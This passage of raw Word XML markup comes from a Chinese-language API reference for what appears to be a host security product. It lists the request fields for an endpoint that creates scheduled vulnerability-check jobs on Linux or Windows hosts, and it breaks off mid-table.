            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D6EF264" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1455A8B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35364BC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30E81935" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="191E84FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E02C62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D1382F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="609435FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="37359429" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="531BC81D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>defaultValue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD8F3C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D0CDAB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="712F1B42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参数默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D81B300" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="新建漏洞检测作业请求"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r>
        <w:t>新建漏洞检测作业请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BCD321" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC6172" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/poc/job/{linux|win}/add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66331EB0"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2330"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4207"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="741C5B1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22D42B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D646AB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="005E2C2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D150FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47D43582" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EE05D05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="005D81D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E4A62FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C3FD2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名称,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4722D703" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3315A2BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6010A5FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BCD4BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C3A6433" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否定时, 不传时为不定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DBDF23B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9F69CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64AAC3E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="062A3403" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C1A0852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnabled=true时必填，cron任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C672FB5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B027D00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59825259" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="779E0927" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04D221CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否启用,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F6B4F57" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D9DE6C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DAA5633" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB9C581" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DAE40A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7566E31A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42CF9240" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="302A6C54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="668AAC81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7108B078" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行范围名称，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F12A707" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072351DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="710830AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="624028D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="526B07AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注,可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D36D394" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="399EAB4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocTaskCreateParams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171EC19B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11F60ADD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270B7290" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测项列表,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B5FC9BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r>
        <w:t>realm</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="1088"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="08BFE20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4CAD33D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5416AFDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05658FEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="244F1406" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="152471DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444E0034" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F6A9B6F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D9FBA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4097A868" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:全部主机,type为0时，agents和groups不传; 1:主机范围，如果type=1, 则agents必传; 2:业务组范围，如果type=2,则groups必传 不传时为0全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E475769" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32308A65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3A0223" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B70AA18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3A2918" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B1A8296" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31F11AE2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09A10B60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023E08FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20EBA4B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Linux的主机agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13105BE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:r>
        <w:t>pocTaskCreateParams</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1505"/>
        <w:gridCol w:w="2137"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="3335"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2A29218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5A29B96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A37AE31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="452292CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A6685D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="181AFD98" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F8407E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CCECC54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2481B950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FAF0336" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险检查项Id，见4.5.6接口 ,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B32CFE2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E7F74ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>executeTypes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AB59797" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0385607D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
